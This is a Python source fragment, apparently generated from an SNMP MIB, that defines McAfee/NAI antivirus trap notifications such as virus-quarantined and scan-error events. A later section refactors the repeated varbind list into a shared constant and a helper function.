mcafee_EVENT_VIRUS_QUARANTINED = NotificationType((1, 3, 6, 1, 4, 1, 3401, 12, 0) + (0,1032)).setObjects(("NAI-MIB", "naiTrapAgent"), ("NAI-MIB", "naiTrapShortDescription"), ("NAI-MIB", "naiTrapSeverity"), ("TVD-MIB", "mcafee_SOURCEIP"), ("TVD-MIB", "mcafee_GMTTIME"), ("NAI-MIB", "naiTrapAgentVersion"), ("NAI-MIB", "naiTrapLongDescription"), ("NAI-MIB", "naiTrapProblemResolution"), ("NAI-MIB", "naiTrapDiagID"), ("NAI-MIB", "naiTrapURL"), ("NAI-MIB", "naiTrapSourceDNSName"), ("TVD-MIB", "mcafee_TIME"), ("TVD-MIB", "mcafee_TARGETIP"), ("NAI-MIB", "naiTrapTargetDNSName"), ("TVD-MIB", "mcafee_TRAPID"), ("TVD-MIB", "mcafee_ENGINEVERSION"), ("TVD-MIB", "mcafee_DATVERSION"), ("TVD-MIB", "mcafee_ENGINESTATUS"), ("TVD-MIB", "mcafee_VIRUSNAME"), ("TVD-MIB", "mcafee_VIRUSTYPE"), ("TVD-MIB", "mcafee_FILENAME"), ("TVD-MIB", "mcafee_USERNAME"), ("TVD-MIB", "mcafee_OS"), ("TVD-MIB", "mcafee_PROCESSORSERIAL"), ("TVD-MIB", "mcafee_NUMVIRS"), ("TVD-MIB", "mcafee_NUMCLEANED"), ("TVD-MIB", "mcafee_NUMDELETED"), ("TVD-MIB", "mcafee_NUMQUARANTINED"), ("TVD-MIB", "mcafee_SCANRETURNCODE"), ("TVD-MIB", "mcafee_MAILFROMNAME"), ("TVD-MIB", "mcafee_MAILTONAME"), ("TVD-MIB", "mcafee_MAILCCNAME"), ("TVD-MIB", "mcafee_MAILSUBJECTLINE"), ("TVD-MIB", "mcafee_MAILIDENTIFIERINFO"), ("TVD-MIB", "mcafee_LANGUAGECODE"), ("TVD-MIB", "mcafee_CLIENTCOMPUTER"), ("TVD-MIB", "mcafee_TSCLIENTID"), ("TVD-MIB", "mcafee_ACCESSPROCESSNAME"), ("TVD-MIB", "mcafee_NOTEID"), ("TVD-MIB", "mcafee_NOTESSERVERNAME"), ("TVD-MIB", "mcafee_NOTESDBNAME"), ("TVD-MIB", "mcafee_DOMAIN"), ("TVD-MIB", "mcafee_OBRULE"), ("TVD-MIB", "mcafee_EVENTNAME"))
mcafee_EVENT_VIRUS_QUARANTINE_FAILURE = NotificationType((1, 3, 6, 1, 4, 1, 3401, 12, 0) + (0,1033)).setObjects(("NAI-MIB", "naiTrapAgent"), ("NAI-MIB", "naiTrapShortDescription"), ("NAI-MIB", "naiTrapSeverity"), ("TVD-MIB", "mcafee_SOURCEIP"), ("TVD-MIB", "mcafee_GMTTIME"), ("NAI-MIB", "naiTrapAgentVersion"), ("NAI-MIB", "naiTrapLongDescription"), ("NAI-MIB", "naiTrapProblemResolution"), ("NAI-MIB", "naiTrapDiagID"), ("NAI-MIB", "naiTrapURL"), ("NAI-MIB", "naiTrapSourceDNSName"), ("TVD-MIB", "mcafee_TIME"), ("TVD-MIB", "mcafee_TARGETIP"), ("NAI-MIB", "naiTrapTargetDNSName"), ("TVD-MIB", "mcafee_TRAPID"), ("TVD-MIB", "mcafee_ENGINEVERSION"), ("TVD-MIB", "mcafee_DATVERSION"), ("TVD-MIB", "mcafee_ENGINESTATUS"), ("TVD-MIB", "mcafee_VIRUSNAME"), ("TVD-MIB", "mcafee_VIRUSTYPE"), ("TVD-MIB", "mcafee_FILENAME"), ("TVD-MIB", "mcafee_USERNAME"), ("TVD-MIB", "mcafee_OS"), ("TVD-MIB", "mcafee_PROCESSORSERIAL"), ("TVD-MIB", "mcafee_NUMVIRS"), ("TVD-MIB", "mcafee_NUMCLEANED"), ("TVD-MIB", "mcafee_NUMDELETED"), ("TVD-MIB", "mcafee_NUMQUARANTINED"), ("TVD-MIB", "mcafee_SCANRETURNCODE"), ("TVD-MIB", "mcafee_MAILFROMNAME"), ("TVD-MIB", "mcafee_MAILTONAME"), ("TVD-MIB", "mcafee_MAILCCNAME"), ("TVD-MIB", "mcafee_MAILSUBJECTLINE"), ("TVD-MIB", "mcafee_MAILIDENTIFIERINFO"), ("TVD-MIB", "mcafee_LANGUAGECODE"), ("TVD-MIB", "mcafee_CLIENTCOMPUTER"), ("TVD-MIB", "mcafee_TSCLIENTID"), ("TVD-MIB", "mcafee_ACCESSPROCESSNAME"), ("TVD-MIB", "mcafee_NOTEID"), ("TVD-MIB", "mcafee_NOTESSERVERNAME"), ("TVD-MIB", "mcafee_NOTESDBNAME"), ("TVD-MIB", "mcafee_DOMAIN"), ("TVD-MIB", "mcafee_OBRULE"), ("TVD-MIB", "mcafee_EVENTNAME"))
mcafee_EVENT_SCANEND_NO_VIRUSES = NotificationType((1, 3, 6, 1, 4, 1, 3401, 12, 0) + (0,1034)).setObjects(("NAI-MIB", "naiTrapAgent"), ("NAI-MIB", "naiTrapShortDescription"), ("NAI-MIB", "naiTrapSeverity"), ("TVD-MIB", "mcafee_SOURCEIP"), ("TVD-MIB", "mcafee_GMTTIME"), ("NAI-MIB", "naiTrapAgentVersion"), ("NAI-MIB", "naiTrapLongDescription"), ("NAI-MIB", "naiTrapProblemResolution"), ("NAI-MIB", "naiTrapDiagID"), ("NAI-MIB", "naiTrapURL"), ("NAI-MIB", "naiTrapSourceDNSName"), ("TVD-MIB", "mcafee_TIME"), ("TVD-MIB", "mcafee_TARGETIP"), ("NAI-MIB", "naiTrapTargetDNSName"), ("TVD-MIB", "mcafee_TRAPID"), ("TVD-MIB", "mcafee_ENGINEVERSION"), ("TVD-MIB", "mcafee_DATVERSION"), ("TVD-MIB", "mcafee_ENGINESTATUS"), ("TVD-MIB", "mcafee_VIRUSNAME"), ("TVD-MIB", "mcafee_VIRUSTYPE"), ("TVD-MIB", "mcafee_FILENAME"), ("TVD-MIB", "mcafee_USERNAME"), ("TVD-MIB", "mcafee_OS"), ("TVD-MIB", "mcafee_PROCESSORSERIAL"), ("TVD-MIB", "mcafee_NUMVIRS"), ("TVD-MIB", "mcafee_NUMCLEANED"), ("TVD-MIB", "mcafee_NUMDELETED"), ("TVD-MIB", "mcafee_NUMQUARANTINED"), ("TVD-MIB", "mcafee_SCANRETURNCODE"), ("TVD-MIB", "mcafee_MAILFROMNAME"), ("TVD-MIB", "mcafee_MAILTONAME"), ("TVD-MIB", "mcafee_MAILCCNAME"), ("TVD-MIB", "mcafee_MAILSUBJECTLINE"), ("TVD-MIB", "mcafee_MAILIDENTIFIERINFO"), ("TVD-MIB", "mcafee_LANGUAGECODE"), ("TVD-MIB", "mcafee_CLIENTCOMPUTER"), ("TVD-MIB", "mcafee_TSCLIENTID"), ("TVD-MIB", "mcafee_ACCESSPROCESSNAME"), ("TVD-MIB", "mcafee_NOTEID"), ("TVD-MIB", "mcafee_NOTESSERVERNAME"), ("TVD-MIB", "mcafee_NOTESDBNAME"), ("TVD-MIB", "mcafee_DOMAIN"), ("TVD-MIB", "mcafee_OBRULE"), ("TVD-MIB", "mcafee_EVENTNAME"))
mcafee_EVENT_SCAN_CANCELED = NotificationType((1, 3, 6, 1, 4, 1, 3401, 12, 0) + (0,1035)).setObjects(("NAI-MIB", "naiTrapAgent"), ("NAI-MIB", "naiTrapShortDescription"), ("NAI-MIB", "naiTrapSeverity"), ("TVD-MIB", "mcafee_SOURCEIP"), ("TVD-MIB", "mcafee_GMTTIME"), ("NAI-MIB", "naiTrapAgentVersion"), ("NAI-MIB", "naiTrapLongDescription"), ("NAI-MIB", "naiTrapProblemResolution"), ("NAI-MIB", "naiTrapDiagID"), ("NAI-MIB", "naiTrapURL"), ("NAI-MIB", "naiTrapSourceDNSName"), ("TVD-MIB", "mcafee_TIME"), ("TVD-MIB", "mcafee_TARGETIP"), ("NAI-MIB", "naiTrapTargetDNSName"), ("TVD-MIB", "mcafee_TRAPID"), ("TVD-MIB", "mcafee_ENGINEVERSION"), ("TVD-MIB", "mcafee_DATVERSION"), ("TVD-MIB", "mcafee_ENGINESTATUS"), ("TVD-MIB", "mcafee_VIRUSNAME"), ("TVD-MIB", "mcafee_VIRUSTYPE"), ("TVD-MIB", "mcafee_FILENAME"), ("TVD-MIB", "mcafee_USERNAME"), ("TVD-MIB", "mcafee_OS"), ("TVD-MIB", "mcafee_PROCESSORSERIAL"), ("TVD-MIB", "mcafee_NUMVIRS"), ("TVD-MIB", "mcafee_NUMCLEANED"), ("TVD-MIB", "mcafee_NUMDELETED"), ("TVD-MIB", "mcafee_NUMQUARANTINED"), ("TVD-MIB", "mcafee_SCANRETURNCODE"), ("TVD-MIB", "mcafee_MAILFROMNAME"), ("TVD-MIB", "mcafee_MAILTONAME"), ("TVD-MIB", "mcafee_MAILCCNAME"), ("TVD-MIB", "mcafee_MAILSUBJECTLINE"), ("TVD-MIB", "mcafee_MAILIDENTIFIERINFO"), ("TVD-MIB", "mcafee_LANGUAGECODE"), ("TVD-MIB", "mcafee_CLIENTCOMPUTER"), ("TVD-MIB", "mcafee_TSCLIENTID"), ("TVD-MIB", "mcafee_ACCESSPROCESSNAME"), ("TVD-MIB", "mcafee_NOTEID"), ("TVD-MIB", "mcafee_NOTESSERVERNAME"), ("TVD-MIB", "mcafee_NOTESDBNAME"), ("TVD-MIB", "mcafee_DOMAIN"), ("TVD-MIB", "mcafee_OBRULE"), ("TVD-MIB", "mcafee_EVENTNAME"))
mcafee_EVENT_VIRUS_FOUND_IN_MEMORY = NotificationType((1, 3, 6, 1, 4, 1, 3401, 12, 0) + (0,1036)).setObjects(("NAI-MIB", "naiTrapAgent"), ("NAI-MIB", "naiTrapShortDescription"), ("NAI-MIB", "naiTrapSeverity"), ("TVD-MIB", "mcafee_SOURCEIP"), ("TVD-MIB", "mcafee_GMTTIME"), ("NAI-MIB", "naiTrapAgentVersion"), ("NAI-MIB", "naiTrapLongDescription"), ("NAI-MIB", "naiTrapProblemResolution"), ("NAI-MIB", "naiTrapDiagID"), ("NAI-MIB", "naiTrapURL"), ("NAI-MIB", "naiTrapSourceDNSName"), ("TVD-MIB", "mcafee_TIME"), ("TVD-MIB", "mcafee_TARGETIP"), ("NAI-MIB", "naiTrapTargetDNSName"), ("TVD-MIB", "mcafee_TRAPID"), ("TVD-MIB", "mcafee_ENGINEVERSION"), ("TVD-MIB", "mcafee_DATVERSION"), ("TVD-MIB", "mcafee_ENGINESTATUS"), ("TVD-MIB", "mcafee_VIRUSNAME"), ("TVD-MIB", "mcafee_VIRUSTYPE"), ("TVD-MIB", "mcafee_FILENAME"), ("TVD-MIB", "mcafee_USERNAME"), ("TVD-MIB", "mcafee_OS"), ("TVD-MIB", "mcafee_PROCESSORSERIAL"), ("TVD-MIB", "mcafee_NUMVIRS"), ("TVD-MIB", "mcafee_NUMCLEANED"), ("TVD-MIB", "mcafee_NUMDELETED"), ("TVD-MIB", "mcafee_NUMQUARANTINED"), ("TVD-MIB", "mcafee_SCANRETURNCODE"), ("TVD-MIB", "mcafee_MAILFROMNAME"), ("TVD-MIB", "mcafee_MAILTONAME"), ("TVD-MIB", "mcafee_MAILCCNAME"), ("TVD-MIB", "mcafee_MAILSUBJECTLINE"), ("TVD-MIB", "mcafee_MAILIDENTIFIERINFO"), ("TVD-MIB", "mcafee_LANGUAGECODE"), ("TVD-MIB", "mcafee_CLIENTCOMPUTER"), ("TVD-MIB", "mcafee_TSCLIENTID"), ("TVD-MIB", "mcafee_ACCESSPROCESSNAME"), ("TVD-MIB", "mcafee_NOTEID"), ("TVD-MIB", "mcafee_NOTESSERVERNAME"), ("TVD-MIB", "mcafee_NOTESDBNAME"), ("TVD-MIB", "mcafee_DOMAIN"), ("TVD-MIB", "mcafee_OBRULE"), ("TVD-MIB", "mcafee_EVENTNAME"))
mcafee_EVENT_VIRUS_IN_BOOT_RECORD = NotificationType((1, 3, 6, 1, 4, 1, 3401, 12, 0) + (0,1037)).setObjects(("NAI-MIB", "naiTrapAgent"), ("NAI-MIB", "naiTrapShortDescription"), ("NAI-MIB", "naiTrapSeverity"), ("TVD-MIB", "mcafee_SOURCEIP"), ("TVD-MIB", "mcafee_GMTTIME"), ("NAI-MIB", "naiTrapAgentVersion"), ("NAI-MIB", "naiTrapLongDescription"), ("NAI-MIB", "naiTrapProblemResolution"), ("NAI-MIB", "naiTrapDiagID"), ("NAI-MIB", "naiTrapURL"), ("NAI-MIB", "naiTrapSourceDNSName"), ("TVD-MIB", "mcafee_TIME"), ("TVD-MIB", "mcafee_TARGETIP"), ("NAI-MIB", "naiTrapTargetDNSName"), ("TVD-MIB", "mcafee_TRAPID"), ("TVD-MIB", "mcafee_ENGINEVERSION"), ("TVD-MIB", "mcafee_DATVERSION"), ("TVD-MIB", "mcafee_ENGINESTATUS"), ("TVD-MIB", "mcafee_VIRUSNAME"), ("TVD-MIB", "mcafee_VIRUSTYPE"), ("TVD-MIB", "mcafee_FILENAME"), ("TVD-MIB", "mcafee_USERNAME"), ("TVD-MIB", "mcafee_OS"), ("TVD-MIB", "mcafee_PROCESSORSERIAL"), ("TVD-MIB", "mcafee_NUMVIRS"), ("TVD-MIB", "mcafee_NUMCLEANED"), ("TVD-MIB", "mcafee_NUMDELETED"), ("TVD-MIB", "mcafee_NUMQUARANTINED"), ("TVD-MIB", "mcafee_SCANRETURNCODE"), ("TVD-MIB", "mcafee_MAILFROMNAME"), ("TVD-MIB", "mcafee_MAILTONAME"), ("TVD-MIB", "mcafee_MAILCCNAME"), ("TVD-MIB", "mcafee_MAILSUBJECTLINE"), ("TVD-MIB", "mcafee_MAILIDENTIFIERINFO"), ("TVD-MIB", "mcafee_LANGUAGECODE"), ("TVD-MIB", "mcafee_CLIENTCOMPUTER"), ("TVD-MIB", "mcafee_TSCLIENTID"), ("TVD-MIB", "mcafee_ACCESSPROCESSNAME"), ("TVD-MIB", "mcafee_NOTEID"), ("TVD-MIB", "mcafee_NOTESSERVERNAME"), ("TVD-MIB", "mcafee_NOTESDBNAME"), ("TVD-MIB", "mcafee_DOMAIN"), ("TVD-MIB", "mcafee_OBRULE"), ("TVD-MIB", "mcafee_EVENTNAME"))
mcafee_EVENT_SCAN_FOUND_INFECTED_FILES = NotificationType((1, 3, 6, 1, 4, 1, 3401, 12, 0) + (0,1038)).setObjects(("NAI-MIB", "naiTrapAgent"), ("NAI-MIB", "naiTrapShortDescription"), ("NAI-MIB", "naiTrapSeverity"), ("TVD-MIB", "mcafee_SOURCEIP"), ("TVD-MIB", "mcafee_GMTTIME"), ("NAI-MIB", "naiTrapAgentVersion"), ("NAI-MIB", "naiTrapLongDescription"), ("NAI-MIB", "naiTrapProblemResolution"), ("NAI-MIB", "naiTrapDiagID"), ("NAI-MIB", "naiTrapURL"), ("NAI-MIB", "naiTrapSourceDNSName"), ("TVD-MIB", "mcafee_TIME"), ("TVD-MIB", "mcafee_TARGETIP"), ("NAI-MIB", "naiTrapTargetDNSName"), ("TVD-MIB", "mcafee_TRAPID"), ("TVD-MIB", "mcafee_ENGINEVERSION"), ("TVD-MIB", "mcafee_DATVERSION"), ("TVD-MIB", "mcafee_ENGINESTATUS"), ("TVD-MIB", "mcafee_VIRUSNAME"), ("TVD-MIB", "mcafee_VIRUSTYPE"), ("TVD-MIB", "mcafee_FILENAME"), ("TVD-MIB", "mcafee_USERNAME"), ("TVD-MIB", "mcafee_OS"), ("TVD-MIB", "mcafee_PROCESSORSERIAL"), ("TVD-MIB", "mcafee_NUMVIRS"), ("TVD-MIB", "mcafee_NUMCLEANED"), ("TVD-MIB", "mcafee_NUMDELETED"), ("TVD-MIB", "mcafee_NUMQUARANTINED"), ("TVD-MIB", "mcafee_SCANRETURNCODE"), ("TVD-MIB", "mcafee_MAILFROMNAME"), ("TVD-MIB", "mcafee_MAILTONAME"), ("TVD-MIB", "mcafee_MAILCCNAME"), ("TVD-MIB", "mcafee_MAILSUBJECTLINE"), ("TVD-MIB", "mcafee_MAILIDENTIFIERINFO"), ("TVD-MIB", "mcafee_LANGUAGECODE"), ("TVD-MIB", "mcafee_CLIENTCOMPUTER"), ("TVD-MIB", "mcafee_TSCLIENTID"), ("TVD-MIB", "mcafee_ACCESSPROCESSNAME"), ("TVD-MIB", "mcafee_NOTEID"), ("TVD-MIB", "mcafee_NOTESSERVERNAME"), ("TVD-MIB", "mcafee_NOTESDBNAME"), ("TVD-MIB", "mcafee_DOMAIN"), ("TVD-MIB", "mcafee_OBRULE"), ("TVD-MIB", "mcafee_EVENTNAME"))
mcafee_EVENT_SCAN_FOUND_AND_CLEANED_INFECTIONS = NotificationType((1, 3, 6, 1, 4, 1, 3401, 12, 0) + (0,1039)).setObjects(("NAI-MIB", "naiTrapAgent"), ("NAI-MIB", "naiTrapShortDescription"), ("NAI-MIB", "naiTrapSeverity"), ("TVD-MIB", "mcafee_SOURCEIP"), ("TVD-MIB", "mcafee_GMTTIME"), ("NAI-MIB", "naiTrapAgentVersion"), ("NAI-MIB", "naiTrapLongDescription"), ("NAI-MIB", "naiTrapProblemResolution"), ("NAI-MIB", "naiTrapDiagID"), ("NAI-MIB", "naiTrapURL"), ("NAI-MIB", "naiTrapSourceDNSName"), ("TVD-MIB", "mcafee_TIME"), ("TVD-MIB", "mcafee_TARGETIP"), ("NAI-MIB", "naiTrapTargetDNSName"), ("TVD-MIB", "mcafee_TRAPID"), ("TVD-MIB", "mcafee_ENGINEVERSION"), ("TVD-MIB", "mcafee_DATVERSION"), ("TVD-MIB", "mcafee_ENGINESTATUS"), ("TVD-MIB", "mcafee_VIRUSNAME"), ("TVD-MIB", "mcafee_VIRUSTYPE"), ("TVD-MIB", "mcafee_FILENAME"), ("TVD-MIB", "mcafee_USERNAME"), ("TVD-MIB", "mcafee_OS"), ("TVD-MIB", "mcafee_PROCESSORSERIAL"), ("TVD-MIB", "mcafee_NUMVIRS"), ("TVD-MIB", "mcafee_NUMCLEANED"), ("TVD-MIB", "mcafee_NUMDELETED"), ("TVD-MIB", "mcafee_NUMQUARANTINED"), ("TVD-MIB", "mcafee_SCANRETURNCODE"), ("TVD-MIB", "mcafee_MAILFROMNAME"), ("TVD-MIB", "mcafee_MAILTONAME"), ("TVD-MIB", "mcafee_MAILCCNAME"), ("TVD-MIB", "mcafee_MAILSUBJECTLINE"), ("TVD-MIB", "mcafee_MAILIDENTIFIERINFO"), ("TVD-MIB", "mcafee_LANGUAGECODE"), ("TVD-MIB", "mcafee_CLIENTCOMPUTER"), ("TVD-MIB", "mcafee_TSCLIENTID"), ("TVD-MIB", "mcafee_ACCESSPROCESSNAME"), ("TVD-MIB", "mcafee_NOTEID"), ("TVD-MIB", "mcafee_NOTESSERVERNAME"), ("TVD-MIB", "mcafee_NOTESDBNAME"), ("TVD-MIB", "mcafee_DOMAIN"), ("TVD-MIB", "mcafee_OBRULE"), ("TVD-MIB", "mcafee_EVENTNAME"))
mcafee_EVENT_ALOG_ERROR = NotificationType((1, 3, 6, 1, 4, 1, 3401, 12, 0) + (0,1040)).setObjects(("NAI-MIB", "naiTrapAgent"), ("NAI-MIB", "naiTrapShortDescription"), ("NAI-MIB", "naiTrapSeverity"), ("TVD-MIB", "mcafee_SOURCEIP"), ("TVD-MIB", "mcafee_GMTTIME"), ("NAI-MIB", "naiTrapAgentVersion"), ("NAI-MIB", "naiTrapLongDescription"), ("NAI-MIB", "naiTrapProblemResolution"), ("NAI-MIB", "naiTrapDiagID"), ("NAI-MIB", "naiTrapURL"), ("NAI-MIB", "naiTrapSourceDNSName"), ("TVD-MIB", "mcafee_TIME"), ("TVD-MIB", "mcafee_TARGETIP"), ("NAI-MIB", "naiTrapTargetDNSName"), ("TVD-MIB", "mcafee_TRAPID"), ("TVD-MIB", "mcafee_ENGINEVERSION"), ("TVD-MIB", "mcafee_DATVERSION"), ("TVD-MIB", "mcafee_ENGINESTATUS"), ("TVD-MIB", "mcafee_VIRUSNAME"), ("TVD-MIB", "mcafee_VIRUSTYPE"), ("TVD-MIB", "mcafee_FILENAME"), ("TVD-MIB", "mcafee_USERNAME"), ("TVD-MIB", "mcafee_OS"), ("TVD-MIB", "mcafee_PROCESSORSERIAL"), ("TVD-MIB", "mcafee_NUMVIRS"), ("TVD-MIB", "mcafee_NUMCLEANED"), ("TVD-MIB", "mcafee_NUMDELETED"), ("TVD-MIB", "mcafee_NUMQUARANTINED"), ("TVD-MIB", "mcafee_SCANRETURNCODE"), ("TVD-MIB", "mcafee_MAILFROMNAME"), ("TVD-MIB", "mcafee_MAILTONAME"), ("TVD-MIB", "mcafee_MAILCCNAME"), ("TVD-MIB", "mcafee_MAILSUBJECTLINE"), ("TVD-MIB", "mcafee_MAILIDENTIFIERINFO"), ("TVD-MIB", "mcafee_LANGUAGECODE"), ("TVD-MIB", "mcafee_CLIENTCOMPUTER"), ("TVD-MIB", "mcafee_TSCLIENTID"), ("TVD-MIB", "mcafee_ACCESSPROCESSNAME"), ("TVD-MIB", "mcafee_NOTEID"), ("TVD-MIB", "mcafee_NOTESSERVERNAME"), ("TVD-MIB", "mcafee_NOTESDBNAME"), ("TVD-MIB", "mcafee_DOMAIN"), ("TVD-MIB", "mcafee_OBRULE"), ("TVD-MIB", "mcafee_EVENTNAME"))
mcafee_EVENT_MEMALLOC_ERROR = NotificationType((1, 3, 6, 1, 4, 1, 3401, 12, 0) + (0,1041)).setObjects(("NAI-MIB", "naiTrapAgent"), ("NAI-MIB", "naiTrapShortDescription"), ("NAI-MIB", "naiTrapSeverity"), ("TVD-MIB", "mcafee_SOURCEIP"), ("TVD-MIB", "mcafee_GMTTIME"), ("NAI-MIB", "naiTrapAgentVersion"), ("NAI-MIB", "naiTrapLongDescription"), ("NAI-MIB", "naiTrapProblemResolution"), ("NAI-MIB", "naiTrapDiagID"), ("NAI-MIB", "naiTrapURL"), ("NAI-MIB", "naiTrapSourceDNSName"), ("TVD-MIB", "mcafee_TIME"), ("TVD-MIB", "mcafee_TARGETIP"), ("NAI-MIB", "naiTrapTargetDNSName"), ("TVD-MIB", "mcafee_TRAPID"), ("TVD-MIB", "mcafee_ENGINEVERSION"), ("TVD-MIB", "mcafee_DATVERSION"), ("TVD-MIB", "mcafee_ENGINESTATUS"), ("TVD-MIB", "mcafee_VIRUSNAME"), ("TVD-MIB", "mcafee_VIRUSTYPE"), ("TVD-MIB", "mcafee_FILENAME"), ("TVD-MIB", "mcafee_USERNAME"), ("TVD-MIB", "mcafee_OS"), ("TVD-MIB", "mcafee_PROCESSORSERIAL"), ("TVD-MIB", "mcafee_NUMVIRS"), ("TVD-MIB", "mcafee_NUMCLEANED"), ("TVD-MIB", "mcafee_NUMDELETED"), ("TVD-MIB", "mcafee_NUMQUARANTINED"), ("TVD-MIB", "mcafee_SCANRETURNCODE"), ("TVD-MIB", "mcafee_MAILFROMNAME"), ("TVD-MIB", "mcafee_MAILTONAME"), ("TVD-MIB", "mcafee_MAILCCNAME"), ("TVD-MIB", "mcafee_MAILSUBJECTLINE"), ("TVD-MIB", "mcafee_MAILIDENTIFIERINFO"), ("TVD-MIB", "mcafee_LANGUAGECODE"), ("TVD-MIB", "mcafee_CLIENTCOMPUTER"), ("TVD-MIB", "mcafee_TSCLIENTID"), ("TVD-MIB", "mcafee_ACCESSPROCESSNAME"), ("TVD-MIB", "mcafee_NOTEID"), ("TVD-MIB", "mcafee_NOTESSERVERNAME"), ("TVD-MIB", "mcafee_NOTESDBNAME"), ("TVD-MIB", "mcafee_DOMAIN"), ("TVD-MIB", "mcafee_OBRULE"), ("TVD-MIB", "mcafee_EVENTNAME"))
mcafee_EVENT_DIR_ACCESS_ERROR = NotificationType((1, 3, 6, 1, 4, 1, 3401, 12, 0) + (0,1042)).setObjects(("NAI-MIB", "naiTrapAgent"), ("NAI-MIB", "naiTrapShortDescription"), ("NAI-MIB", "naiTrapSeverity"), ("TVD-MIB", "mcafee_SOURCEIP"), ("TVD-MIB", "mcafee_GMTTIME"), ("NAI-MIB", "naiTrapAgentVersion"), ("NAI-MIB", "naiTrapLongDescription"), ("NAI-MIB", "naiTrapProblemResolution"), ("NAI-MIB", "naiTrapDiagID"), ("NAI-MIB", "naiTrapURL"), ("NAI-MIB", "naiTrapSourceDNSName"), ("TVD-MIB", "mcafee_TIME"), ("TVD-MIB", "mcafee_TARGETIP"), ("NAI-MIB", "naiTrapTargetDNSName"), ("TVD-MIB", "mcafee_TRAPID"), ("TVD-MIB", "mcafee_ENGINEVERSION"), ("TVD-MIB", "mcafee_DATVERSION"), ("TVD-MIB", "mcafee_ENGINESTATUS"), ("TVD-MIB", "mcafee_VIRUSNAME"), ("TVD-MIB", "mcafee_VIRUSTYPE"), ("TVD-MIB", "mcafee_FILENAME"), ("TVD-MIB", "mcafee_USERNAME"), ("TVD-MIB", "mcafee_OS"), ("TVD-MIB", "mcafee_PROCESSORSERIAL"), ("TVD-MIB", "mcafee_NUMVIRS"), ("TVD-MIB", "mcafee_NUMCLEANED"), ("TVD-MIB", "mcafee_NUMDELETED"), ("TVD-MIB", "mcafee_NUMQUARANTINED"), ("TVD-MIB", "mcafee_SCANRETURNCODE"), ("TVD-MIB", "mcafee_MAILFROMNAME"), ("TVD-MIB", "mcafee_MAILTONAME"), ("TVD-MIB", "mcafee_MAILCCNAME"), ("TVD-MIB", "mcafee_MAILSUBJECTLINE"), ("TVD-MIB", "mcafee_MAILIDENTIFIERINFO"), ("TVD-MIB", "mcafee_LANGUAGECODE"), ("TVD-MIB", "mcafee_CLIENTCOMPUTER"), ("TVD-MIB", "mcafee_TSCLIENTID"), ("TVD-MIB", "mcafee_ACCESSPROCESSNAME"), ("TVD-MIB", "mcafee_NOTEID"), ("TVD-MIB", "mcafee_NOTESSERVERNAME"), ("TVD-MIB", "mcafee_NOTESDBNAME"), ("TVD-MIB", "mcafee_DOMAIN"), ("TVD-MIB", "mcafee_OBRULE"), ("TVD-MIB", "mcafee_EVENTNAME"))
# Every McAfee/NAI trap notification below carries the same ordered list of
# 44 varbinds.  The list is hoisted into one shared constant so a varbind
# change is made in one place instead of being repeated on every line.
_MCAFEE_TRAP_OBJECTS = (
    ("NAI-MIB", "naiTrapAgent"),
    ("NAI-MIB", "naiTrapShortDescription"),
    ("NAI-MIB", "naiTrapSeverity"),
    ("TVD-MIB", "mcafee_SOURCEIP"),
    ("TVD-MIB", "mcafee_GMTTIME"),
    ("NAI-MIB", "naiTrapAgentVersion"),
    ("NAI-MIB", "naiTrapLongDescription"),
    ("NAI-MIB", "naiTrapProblemResolution"),
    ("NAI-MIB", "naiTrapDiagID"),
    ("NAI-MIB", "naiTrapURL"),
    ("NAI-MIB", "naiTrapSourceDNSName"),
    ("TVD-MIB", "mcafee_TIME"),
    ("TVD-MIB", "mcafee_TARGETIP"),
    ("NAI-MIB", "naiTrapTargetDNSName"),
    ("TVD-MIB", "mcafee_TRAPID"),
    ("TVD-MIB", "mcafee_ENGINEVERSION"),
    ("TVD-MIB", "mcafee_DATVERSION"),
    ("TVD-MIB", "mcafee_ENGINESTATUS"),
    ("TVD-MIB", "mcafee_VIRUSNAME"),
    ("TVD-MIB", "mcafee_VIRUSTYPE"),
    ("TVD-MIB", "mcafee_FILENAME"),
    ("TVD-MIB", "mcafee_USERNAME"),
    ("TVD-MIB", "mcafee_OS"),
    ("TVD-MIB", "mcafee_PROCESSORSERIAL"),
    ("TVD-MIB", "mcafee_NUMVIRS"),
    ("TVD-MIB", "mcafee_NUMCLEANED"),
    ("TVD-MIB", "mcafee_NUMDELETED"),
    ("TVD-MIB", "mcafee_NUMQUARANTINED"),
    ("TVD-MIB", "mcafee_SCANRETURNCODE"),
    ("TVD-MIB", "mcafee_MAILFROMNAME"),
    ("TVD-MIB", "mcafee_MAILTONAME"),
    ("TVD-MIB", "mcafee_MAILCCNAME"),
    ("TVD-MIB", "mcafee_MAILSUBJECTLINE"),
    ("TVD-MIB", "mcafee_MAILIDENTIFIERINFO"),
    ("TVD-MIB", "mcafee_LANGUAGECODE"),
    ("TVD-MIB", "mcafee_CLIENTCOMPUTER"),
    ("TVD-MIB", "mcafee_TSCLIENTID"),
    ("TVD-MIB", "mcafee_ACCESSPROCESSNAME"),
    ("TVD-MIB", "mcafee_NOTEID"),
    ("TVD-MIB", "mcafee_NOTESSERVERNAME"),
    ("TVD-MIB", "mcafee_NOTESDBNAME"),
    ("TVD-MIB", "mcafee_DOMAIN"),
    ("TVD-MIB", "mcafee_OBRULE"),
    ("TVD-MIB", "mcafee_EVENTNAME"),
)


def _mcafee_trap(trap_id):
    """Return a NotificationType for McAfee enterprise trap *trap_id*.

    The OID is the enterprise trap root 1.3.6.1.4.1.3401.12.0 extended with
    (0, trap_id), exactly as the pysmi-generated lines spelled it, and each
    notification is given the shared _MCAFEE_TRAP_OBJECTS varbind list
    (unpacked so setObjects receives the tuples positionally, as before).
    """
    return NotificationType(
        (1, 3, 6, 1, 4, 1, 3401, 12, 0) + (0, trap_id)
    ).setObjects(*_MCAFEE_TRAP_OBJECTS)


mcafee_EVENT_WRITE_PROTECT_ERR = _mcafee_trap(1043)
mcafee_EVENT_MEDIA_NOT_FOUND_ERR = _mcafee_trap(1044)
mcafee_EVENT_SCAN_ITEM_INVALID = _mcafee_trap(1045)
mcafee_EVENT_FILE_IO_ERRORS = _mcafee_trap(1046)
mcafee_EVENT_DISK_IO_ERR = _mcafee_trap(1047)
mcafee_EVENT_GEN_SYSTEM_ERROR = _mcafee_trap(1048)
mcafee_EVENT_INTERNAL_APP_ERROR = _mcafee_trap(1049)
mcafee_EVENT_INFECTION_PASSWORD_PROTECTED = _mcafee_trap(1050)
mcafee_EVENT_NOT_SCANNED_PASSWORD = _mcafee_trap(1051)
mcafee_EVENT_INFECTED_BINDARY = _mcafee_trap(1052)
mcafee_EVENT_INFECTED_HEURISTICS = _mcafee_trap(1053)
